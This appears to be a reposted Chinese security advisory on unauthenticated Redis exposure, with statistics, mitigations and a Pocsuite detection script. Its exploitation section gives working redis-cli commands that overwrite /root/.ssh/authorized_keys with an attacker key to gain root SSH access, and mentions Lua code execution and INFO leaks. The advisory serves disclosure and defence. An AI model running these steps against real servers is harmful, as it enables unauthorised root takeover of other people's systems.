日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > windows >内容正文

windows

Redis 未授权访问缺陷可轻易导致系统被黑

發布時間:2023/12/31 windows 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Redis 未授权访问缺陷可轻易导致系统被黑 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

Redis 未授權訪問缺陷可輕易導致系統被黑

漏洞概要

Redis 默認情況下,會綁定在?0.0.0.0:6379,這樣將會將Redis服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問Redis以及讀取Redis的數據。***者在未授權訪問Redis的情況下可以利用Redis的相關方法,可以成功將自己的公鑰寫入目標服務器的?/root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器。

漏洞概述

Redis 默認情況下,會綁定在?0.0.0.0:6379,這樣將會將Redis服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問Redis以及讀取Redis的數據。***者在未授權訪問Redis的情況下可以利用Redis的相關方法,可以成功將自己的公鑰寫入目標服務器的?/root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器。

漏洞描述

Redis 安全模型的觀念是: “請不要將Redis暴露在公開網絡中, 因為讓不受信任的客戶接觸到Redis是非常危險的” 。

Redis 作者之所以放棄解決未授權訪問導致的不安全性是因為, 99.99%使用Redis的場景都是在沙盒化的環境中, 為了0.01%的可能性增加安全規則的同時也增加了復雜性, 雖然這個問題的并不是不能解決的, 但是這在他的設計哲學中仍是不劃算的。

因為其他受信任用戶需要使用Redis或者因為運維人員的疏忽等原因,部分Redis綁定在0.0.0.0:6379,并且沒有開啟認證(這是Redis的默認配置),如果沒有進行采用相關的策略,比如添加防火墻規則避免其他非信任來源ip訪問等,將會導致Redis服務直接暴露在公網上,導致其他用戶可以直接在非授權情況下直接訪問Redis服務并進行相關操作。

利用Redis自身的相關方法,可以進行寫文件操作,***者可以成功將自己的公鑰寫入目標服務器的 /root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器。

漏洞影響

Redis 暴露在公網(即綁定在0.0.0.0:6379,目標IP公網可訪問),并且沒有開啟相關認證和添加相關安全策略情況下可受影響而導致被利用。

通過ZoomEye 的搜索結果顯示,有97700在公網可以直接訪問的Redis服務。

根據 ZoomEye 最新于2015年11月12日0點探測結果顯示:

總的存在無驗證可直接利用 Redis 服務的目標全球有49099,其中中國有16477。其中被明著寫入crackit的,也就是已經被黑的比例分別是全球65%(3.1萬),中國67.5%(1.1萬)。

1.1. ? ?漏洞分析與利用

首先在本地生產公私鑰文件:

Shell

1

$ssh-keygen?–t?rsa

然后將公鑰寫入foo.txt文件

Shell

1

$?(echo?-e?"nn";?cat?id_rsa.pub;?echo?-e?"nn")?>?foo.txt

再連接Redis寫入文件

Shell

1

2

3

4

5

6

$?cat?foo.txt?|?redis-cli?-h?192.168.1.11?-x?set?crackit

$?redis-cli?-h?192.168.1.11

$?192.168.1.11:6379>?config?set?dir?/Users/antirez/.ssh/OK

$?192.168.1.11:6379>?config?get?dir1)?"dir"2)?"/root/.ssh"

$?192.168.1.11:6379>?config?set?dbfilename?"authorized_keys"OK

$?192.168.1.11:6379>?saveOK

這樣就可以成功的將自己的公鑰寫入/root/.ssh文件夾的authotrized_keys文件里,然后***者直接執行:

Shell

1

$?ssh?–i??id_rsa?root@192.168.1.11

即可遠程利用自己的私鑰登錄該服務器。

當然,寫入的目錄不限于/root/.ssh 下的authorized_keys,也可以寫入用戶目錄,不過Redis很多以root權限運行,所以寫入root目錄下,可以跳過猜用戶的步驟。

Redis 未授權的其他危害與利用

數據庫數據泄露

Redis 作為數據庫,保存著各種各樣的數據,如果存在未授權訪問的情況,將會導致數據的泄露,其中包含保存的用戶信息等

代碼執行

Redis可以嵌套Lua腳本的特性將會導致代碼執行, 危害同其他服務器端的代碼執行, 樣例如下

一旦***者能夠在服務器端執行任意代碼, ***方式將會變得多且復雜, 這是非常危險的.

通過Lua代碼***者可以調用 redis.sha1hex() 函數,惡意利用 Redis 服務器進行 SHA-1 的破解。

敏感信息泄露

通過 Redis 的 INFO 命令, 可以查看服務器相關的參數和敏感信息, 為***者的后續***做鋪墊

可以看到泄露了很多 Redis 服務器的信息, 有當前 Redis 版本, 內存運行狀態, 服務端個數等等敏感信息。

全球無驗證可直接利用 Redis 分布情況

全球無驗證可直接利用 Redis TOP 10 國家與地區

漏洞 PoC


Python

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

#!/usr/bin/env?python

#?-*-?coding:utf-8?-*-

import?socket

import?urlparse

from?pocsuite.poc?import?POCBase,?Output

from?pocsuite.utils?import?register

class?TestPOC(POCBase):

????vulID?=?'89339'

????version?=?'1'

????author?=?['Anonymous']

????vulDate?=?'2015-10-26'

????createDate?=?'2015-10-26'

????updateDate?=?'2015-10-26'

????references?=?['http://sebug.net/vuldb/ssvid-89339']

????name?=?'Redis?未授權訪問?PoC'

????appPowerLink?=?'http://redis.io/'

????appName?=?'Redis'

????appVersion?=?'All'

????vulType?=?'Unauthorized?access'

????desc?=?'''

????????redis?默認不需要密碼即可訪問,***直接訪問即可獲取數據庫中所有信息,造成嚴重的信息泄露。

????'''

????samples?=?['']

????def?_verify(self):

????????result?=?{}

????????payload?=?'x2ax31x0dx0ax24x34x0dx0ax69x6ex66x6fx0dx0a'

????????s?=?socket.socket()

????????socket.setdefaulttimeout(10)

????????try:

????????????host?=?urlparse.urlparse(self.url).netloc

????????????port?=?6379

????????????s.connect((host,?port))

????????????s.send(payload)

????????????recvdata?=?s.recv(1024)

????????????if?recvdata?and?'redis_version'?in?recvdata:

????????????????result['VerifyInfo']?=?{}

????????????????result['VerifyInfo']['URL']?=?self.url

????????????????result['VerifyInfo']['Port']?=?port

????????except:

????????????pass

????????s.close()

????????return?self.parse_attack(result)

????def?_attack(self):

????????return?self._verify()

????def?parse_attack(self,?result):

????????output?=?Output(self)

????????if?result:

????????????output.success(result)

????????else:

????????????output.fail('Internet?nothing?returned')

????????return?output

register(TestPOC)


解決方案

臨時解決方案

  • 配置bind選項, 限定可以連接Redis服務器的IP, 并修改redis的默認端口6379.

  • 配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.

  • 配置rename-command CONFIG “RENAME_CONFIG”, 這樣即使存在未授權訪問, 也能夠給***者使用config指令加大難度

  • 好消息是Redis作者表示將會開發”real user”,區分普通用戶和admin權限,普通用戶將會被禁止運行某些命令,如config

  • 官方解決方案

    暫無官方解決方案

    推薦防護方案

    暫無防護方案


    轉載于:https://blog.51cto.com/lwm666/1931125

    總結

    以上是生活随笔為你收集整理的Redis 未授权访问缺陷可轻易导致系统被黑的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 欧美区视频 | 国产免费看黄 | 国产aⅴ激情无码久久久无码 | 国产精品5| 视频在线观看免费大片 | 色久视频 | 不卡av在线 | 蜜桃一区二区 | 久久偷看各类wc女厕嘘嘘偷窃 | 国产又粗又大又长 | 日本v视频 | 久久永久免费视频 | 男女视频免费 | 久久亚洲精品国产精品黑人v | 久久久一区二区三区四区 | 久久久久97 | 日韩成人av在线播放 | 日韩毛片无码永久免费看 | 欧美性xxxx | 成人影视免费观看 | 91av在线视频播放 | 超清纯大学生白嫩啪啪 | 黄色小视频在线免费看 | 岛国精品一区二区三区 | 亚欧洲精品视频在线观看 | 国产最新在线视频 | 在线免费av观看 | 欧美剧场 | 国产男女猛烈无遮挡免费观看网站 | 亚洲视频在线观看免费视频 | 亚洲第一免费网站 | 国产精品男同 | 九九热在线视频 | 又黄又色又爽 | 国产午夜激情 | 久久99影院 | 一级特毛片| 欧美精品在欧美一区二区 | 91精品播放 | 影音先锋每日资源 | 97人人人 | 艳妇av | 日本一区二区三区在线观看视频 | 欧美精品一区在线观看 | 久久影院一区二区 | 欧美视频一区二区三区四区在线观看 | 91视频专区 | 成人免费毛片网 | 日本在线不卡一区二区 | 亚洲搞av | 污版视频在线观看 | 88福利视频 | 在线射 | 女同一区 | 激情网久久 | 亚洲综合成人av | 91精品久 | 欧美亚洲精品一区 | 欧美少妇15p | 特黄特色特刺激免费播放 | 一区二区三区啪啪啪 | 黄色国产在线视频 | 亚洲精品一区二区潘金莲 | 2022av视频| 秋霞成人午夜伦在线观看 | 黄a在线| 国产激情免费 | 国产精品99久久久久久宅男 | 中字幕一区二区三区乱码 | 国产精品国产三级国产Av车上的 | 日本中文字幕观看 | 一级黄色美女视频 | 成人免费在线视频观看 | 国产成人免费 | 人人综合网 | 无码精品在线观看 | 美女网站视频在线观看 | 四川少妇xxx奶大xxx | 午夜精品久久久久久久四虎美女版 | 内地级a艳片高清免费播放 91在线精品一区二区 | 久草这里只有精品 | 人人插插| 黄页免费视频 | 亚洲第十页 | 国产精品系列在线播放 | 美女狠狠干 | 欧美 日韩 国产 成人 在线 91 | 制服丝袜av一区二区三区下载 | 美国黄色一级视频 | 亚洲黄色小视频 | 亚洲黄色中文字幕 | 国产五月| 四虎www | 亚洲av成人精品一区二区三区 | 中文字幕观看av | 极品美女扒开粉嫩小泬 | 日本色一区 | 重口变态虐黄网站 | 亚洲欧美日韩国产一区 |